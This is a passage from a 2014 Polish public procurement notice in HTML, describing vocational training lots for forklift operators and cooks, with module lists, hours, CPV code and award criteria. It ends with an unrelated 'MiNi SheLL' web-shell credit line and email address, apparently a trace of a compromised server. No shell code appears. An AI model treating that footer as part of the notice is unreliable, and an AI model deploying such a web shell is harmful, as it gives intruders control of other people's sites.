Zamawiający zastrzega sobie prawo skierowania mniejszej  ilości osób na szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KIEROWCA OPERATOR WÓZKÓW JEZDNIOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres pracy: kierowanie i operowanie wózkami jezdniowymi w transporcie wewnątrzzakładowym
Kod zawodu: 833401
a) szkolenie będzie prowadzone dla 6 osób skierowanych przez Zamawiającego
b) ogólne cele szkolenia: uzyskanie niezbędnych umiejętności praktycznych w zakresie samodzielnego obsługiwania wózków jezdniowych w transporcie wewnątrzzakładowym. 
c) modułowy program szkolenia zawodowego obejmuje 88 godzin i następujące moduły:
- podział i charakterystyka wózków jezdniowych na typy, odmiany,
- budowa i wyposażenie wózka jezdniowego,
- czynności operatora przy obsłudze wózka jezdniowego,
- klasyfikacja transportu wewnątrzzakładowego,
- przepisy przepisów ruchu drogowego przy kierowaniu wózkiem jezdniowym,
- organizowanie pracy wózkiem jezdniowym oraz załadunku,
- bezpieczeństwo i higiena pracy przy eksploatacji wózków jezdniowych,
- urządzenia do uruchamiania i kierowania wózkiem jezdniowym,
- trasa wózka oraz czynności związane z manewrami,
- wykonywanie manewrów wózkiem jezdniowym bez ładunku,
- wykonywanie manewrów wózkiem jezdniowym z ładunkiem,
- wykonywanie manewrów wózkiem jezdniowym na wzniesieniu z obciążeniem,
- wykonywanie manewrów wózkiem jezdniowym z osprzętem,
- wymiana butli gazowej,
d) szkolenie obejmuje 88 godzin dydaktycznych (1 godzina = 45 minut) dla 1 uczestnika szkolenia, w tym zajęcia teoretyczne oraz praktyczne,
e) badanie osiągnięcia założonych celów odbywać się będzie podczas  egzaminów sprawdzających poziom zdobytej wiedzy i  umiejętności każdego uczestnika, potwierdzony wydanymi certyfikatami z logo projektu  i zaświadczeniem MEN oraz uprawnieniami wydanymi przez Urząd Dozoru Technicznego (UDT),
f) Wykonawca podczas praktycznej nauki zapewnia co najmniej jeden wózek jezdniowy dla trzech uczestników kursu.
Zamawiający zastrzega sobie prawo skierowania mniejszej  ilości osób na szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KUCHARZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres pracy: wykonywanie zadań w kuchni pod nadzorem kucharza lub kuchmistrza
Kod zawodu: 512201
a) szkolenie będzie prowadzone dla 4 osób skierowanych przez Zamawiającego,
b) ogólne cele  szkolenia: nabycie umiejętności i kwalifikacji zawodowych na stanowisku kucharza wykonującego zadania pod nadzorem kucharza lub kuchmistrza
c) modułowy program szkolenia zawodowego obejmuje 180 godzin i następujące moduły:
- przygotowanie stanowiska pracy zgodnie z wymogami,
- czynności porządkowe w kuchni,
- przechowywanie surowców i przygotowanie do obróbki wstępnej,
- obróbka wstępna ryb,
- obróbka wstępna jarzyn,
- obróbka wstępna drobiu i dzikiego ptactwa,
- obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny,
- obróbka wstępna podrobów,
- przygotowanie surówek,
- obróbka termiczna produktów,
- przygotowanie sałatek,
- przygotowanie potraw mlecznych,
- obróbka termiczna jarzyn,
- przygotowanie potraw z kaszy,
- przygotowanie potraw z mąki,
- przygotowanie potraw z jaj,
- sporządzanie zup i dodatków do zup,
d) szkolenie powinno obejmować minimum  180 godzin dydaktycznych (1 godzina = 45 minut) dla 1 uczestnika szkolenia, w tym zajęcia teoretyczne oraz praktyczne,
e) Wykonawca w ramach szkolenia zapewnia  wyrobienie każdemu uczestnikowi książeczki sanepidu oraz zapoznanie z minimum sanitarnym, które  dotyczy odpowiednio charakteru pracy: higieny żywności, stosowania zasad HACCP, stosowania zasad GHP i GMP (dobrej praktyki higieniczno-produkcyjnej),
f) badanie osiągnięcia założonych celów odbywać się będzie podczas  egzaminów sprawdzających poziom zdobytej wiedzy i  umiejętności każdego uczestnika, potwierdzony wydanymi certyfikatami z logo projektu  i zaświadczeniem MEN.
Zamawiający zastrzega sobie prawo skierowania mniejszej  ilości osób na szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com